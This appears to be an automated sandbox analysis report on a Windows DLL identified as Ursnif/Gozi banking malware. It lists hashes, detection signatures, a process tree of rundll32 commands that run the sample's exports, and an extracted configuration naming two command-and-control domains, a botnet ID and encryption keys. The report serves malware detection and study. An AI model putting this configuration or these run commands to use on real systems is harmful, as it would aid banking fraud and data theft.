Play interactive tour

Edit tour

Windows Analysis Report 3d0.dll

Overview

General Information

Sample Name:	3d0.dll
Analysis ID:	446439
MD5:	3d080af5324b49363773d0db21b620ed
SHA1:	2724f486e0f8607eda3ea9e9783ea4f46bc98342
SHA256:	c21498aea57a809c36258572bc551c6047a4bf93958bc7a3d4b46d844fc9f1b3
Tags:	dllgozi
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Yara detected Ursnif

Machine Learning detection for sample

Writes registry values via WMI

Antivirus or Machine Learning detection for unpacked file

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

Queries the installation date of Windows

Sample execution stops while process was sleeping (likely an evasion)

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 5364 cmdline: loaddll32.exe 'C:\Users\user\Desktop\3d0.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)

cmd.exe (PID: 4948 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\3d0.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 5312 cmdline: rundll32.exe 'C:\Users\user\Desktop\3d0.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 5544 cmdline: rundll32.exe C:\Users\user\Desktop\3d0.dll,Childrenwin MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 1288 cmdline: rundll32.exe C:\Users\user\Desktop\3d0.dll,Did MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 3040 cmdline: rundll32.exe C:\Users\user\Desktop\3d0.dll,Egggun MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6036 cmdline: rundll32.exe C:\Users\user\Desktop\3d0.dll,Instantprepare MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6132 cmdline: rundll32.exe C:\Users\user\Desktop\3d0.dll,Otherdesign MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

iexplore.exe (PID: 5040 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 4968 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5040 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "c946IFxWIDGK9Hq1Ybb438yBu8Cj3egs+XQOxscJJsDTjHJFh9R3UWfjeG6mmXpq1NpAgebksnoZUidy5aQquO4l2kngoJviyLUUuuyzBCrx3/NomLag07NZIvCCUnkHmthu91L5hF46C2c/M3O0C6vE49KPiNZZJM77Kb93s25NFKjcj9Vn7XCgp3iYFMPmh7k5s+Do1zOfVMTWbqUnBJgxmQuc10Qd1Uw6Ijr84I4ace4Xe6fmScTrxv7elZHW9xwBGYTCV+2TyjBLdlrvczgkBNBMV8eyommZtWxH+x7W9FA8cYZRvDdfEkxW2aBLg+UhdWBTncvMhOi/WlMileBBGGOX5LpmS2dOYm1o85s=", "c2_domain": ["authd.feronok.com", "app.bighomegl.at"], "botnet": "6000", "server": "580", "serpent_key": "acGSuehuI5dQ2qw3", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000004.00000003.471466961.00000000059B8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.471539450.00000000059B8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000002.484867910.00000000059B8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.471563129.00000000059B8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.471585703.00000000059B8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.471598164.00000000059B8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.471441604.00000000059B8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.471514910.00000000059B8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.471488667.00000000059B8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: rundll32.exe PID: 5312	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 5 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000004.00000003.400598077.0000000003050000.00000040.00000001.sdmp

Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "c946IFxWIDGK9Hq1Ybb438yBu8Cj3egs+XQOxscJJsDTjHJFh9R3UWfjeG6mmXpq1NpAgebksnoZUidy5aQquO4l2kngoJviyLUUuuyzBCrx3/NomLag07NZIvCCUnkHmthu91L5hF46C2c/M3O0C6vE49KPiNZZJM77Kb93s25NFKjcj9Vn7XCgp3iYFMPmh7k5s+Do1zOfVMTWbqUnBJgxmQuc10Qd1Uw6Ijr84I4ace4Xe6fmScTrxv7elZHW9xwBGYTCV+2TyjBLdlrvczgkBNBMV8eyommZtWxH+x7W9FA8cYZRvDdfEkxW2aBLg+UhdWBTncvMhOi/WlMileBBGGOX5LpmS2dOYm1o85s=", "c2_domain": ["authd.feronok.com", "app.bighomegl.at"], "botnet": "6000", "server": "580", "serpent_key": "acGSuehuI5dQ2qw3", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}

Multi AV Scanner detection for domain / URL

Show sources

Source: authd.feronok.com

Virustotal: Detection: 10%

Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: 3d0.dll

Virustotal: Detection: 55%

Perma Link

Machine Learning detection for sample

Show sources

Source: 3d0.dll

Joe Sandbox ML: detected

Source: 4.2.rundll32.exe.30e0000.2.unpack	Avira: Label: TR/Crypt.XPACK.Gen8
Source: 0.2.loaddll32.exe.10e0000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen8

Source: 3d0.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source:

Binary string: c:\834\Bar\Me\shop\Prop\Woman \where.pdb source: loaddll32.exe, 00000000.00000002.479359955.0000000001134000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.481255788.0000000003134000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.481586184.00000000049C4000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.480846819.0000000002F64000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.481573305.0000000002F34000.00000002.00020000.sdmp, 3d0.dll

Source: unknown

DNS traffic detected: queries for: authd.feronok.com

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000004.00000003.471466961.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.471539450.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.484867910.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.471563129.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.471585703.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.471598164.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.471441604.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.471514910.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.471488667.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5312, type: MEMORY

Source: loaddll32.exe, 00000000.00000002.480410281.000000000171B000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000004.00000003.471466961.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.471539450.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.484867910.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.471563129.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.471585703.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.471598164.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.471441604.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.471514910.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.471488667.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5312, type: MEMORY

System Summary:

Writes registry values via WMI

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_010E1B9C GetProcAddress,NtCreateSection,memset,	0_2_010E1B9C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_010E1EC7 NtMapViewOfSection,	0_2_010E1EC7
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_010E2485 NtQueryVirtualMemory,	0_2_010E2485
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_011D2D06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	0_2_011D2D06
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_011D8005 NtQueryVirtualMemory,	0_2_011D8005
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_030E1B9C GetProcAddress,NtCreateSection,memset,	4_2_030E1B9C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_030E1EC7 NtMapViewOfSection,	4_2_030E1EC7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_030E2485 NtQueryVirtualMemory,	4_2_030E2485
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04972485 NtQueryVirtualMemory,	6_2_04972485
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_02F11EC7 NtMapViewOfSection,	7_2_02F11EC7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_02F11B9C GetProcAddress,NtCreateSection,memset,	7_2_02F11B9C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_02F12485 NtQueryVirtualMemory,	7_2_02F12485
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_03292D06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	7_2_03292D06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_03298005 NtQueryVirtualMemory,	7_2_03298005
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_02EE1EC7 NtMapViewOfSection,	8_2_02EE1EC7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_02EE1B9C GetProcAddress,NtCreateSection,memset,	8_2_02EE1B9C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_02EE2485 NtQueryVirtualMemory,	8_2_02EE2485

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_010E2264	0_2_010E2264
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_011D3109	0_2_011D3109
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_011D7DE0	0_2_011D7DE0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_011D2206	0_2_011D2206
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_01115A90	0_2_01115A90
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_011225D0	0_2_011225D0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_011217F0	0_2_011217F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_030E2264	4_2_030E2264
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_03115A90	4_2_03115A90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_031217F0	4_2_031217F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_031225D0	4_2_031225D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04972264	6_2_04972264
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_049A5A90	6_2_049A5A90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_049B25D0	6_2_049B25D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_049B17F0	6_2_049B17F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_02F12264	7_2_02F12264
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_03293109	7_2_03293109
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_03297DE0	7_2_03297DE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_03292206	7_2_03292206
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_02F45A90	7_2_02F45A90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_02F517F0	7_2_02F517F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_02F525D0	7_2_02F525D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_02EE2264	8_2_02EE2264
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_02F15A90	8_2_02F15A90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_02F217F0	8_2_02F217F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_02F225D0	8_2_02F225D0

Source: 3d0.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: classification engine

Classification label: mal80.troj.winDLL@18/5@3/0

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_011D513E CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

0_2_011D513E

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DFD2FE459C37A3F042.TMP

Jump to behavior

Source: 3d0.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3d0.dll,Childrenwin

Source: 3d0.dll

Virustotal: Detection: 55%

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\3d0.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\3d0.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3d0.dll,Childrenwin
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\3d0.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3d0.dll,Did
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3d0.dll,Egggun
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3d0.dll,Instantprepare
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3d0.dll,Otherdesign
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5040 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\3d0.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3d0.dll,Childrenwin	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3d0.dll,Did	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3d0.dll,Egggun	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3d0.dll,Instantprepare	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3d0.dll,Otherdesign	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\3d0.dll',#1	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5040 CREDAT:17410 /prefetch:2	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: 3d0.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 3d0.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 3d0.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 3d0.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 3d0.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 3d0.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 3d0.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Source: 3d0.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 3d0.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 3d0.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 3d0.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 3d0.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_010E1F7C LoadLibraryA,GetProcAddress,

0_2_010E1F7C

Source: 3d0.dll

Static PE information: real checksum: 0x7cc80 should be: 0x7d379

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_010E2200 push ecx; ret	0_2_010E2209
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_010E2253 push ecx; ret	0_2_010E2263
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_011D7DCF push ecx; ret	0_2_011D7DDF
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_011D7A60 push ecx; ret	0_2_011D7A69
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_010F0815 push esi; ret	0_2_010F0859
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_010F4391 pushfd ; ret	0_2_010F4392
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_010EE204 push ebx; iretd	0_2_010EE20D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_010F45B9 push ds; ret	0_2_010F45ED
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_010F266E push eax; ret	0_2_010F266F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_010F4ECD push ebx; iretd	0_2_010F4EE9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_01157D0C push edx; ret	0_2_01157D0F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0115773B push esp; iretd	0_2_0115774A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_01156D42 push ebp; iretd	0_2_01156D4E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_011574B3 push ebx; retf	0_2_011574B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_030E2200 push ecx; ret	4_2_030E2209
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_030E2253 push ecx; ret	4_2_030E2263
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_030F4391 pushfd ; ret	4_2_030F4392
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_030EE204 push ebx; iretd	4_2_030EE20D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_030F0815 push esi; ret	4_2_030F0859
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_030F266E push eax; ret	4_2_030F266F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_030F4ECD push ebx; iretd	4_2_030F4EE9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_030F45B9 push ds; ret	4_2_030F45ED
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_03157D0C push edx; ret	4_2_03157D0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0315773B push esp; iretd	4_2_0315774A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_03156D42 push ebp; iretd	4_2_03156D4E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_031574B3 push ebx; retf	4_2_031574B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04972200 push ecx; ret	6_2_04972209
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04972253 push ecx; ret	6_2_04972263
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_049845B9 push ds; ret	6_2_049845ED
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04984ECD push ebx; iretd	6_2_04984EE9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0498266E push eax; ret	6_2_0498266F

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000004.00000003.471466961.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.471539450.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.484867910.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.471563129.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.471585703.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.471598164.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.471441604.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.471514910.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.471488667.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5312, type: MEMORY

Source: C:\Windows\SysWOW64\rundll32.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Last function: Thread delayed
Source: C:\Windows\System32\loaddll32.exe	Last function: Thread delayed

Source: C:\Windows\System32\loaddll32.exe

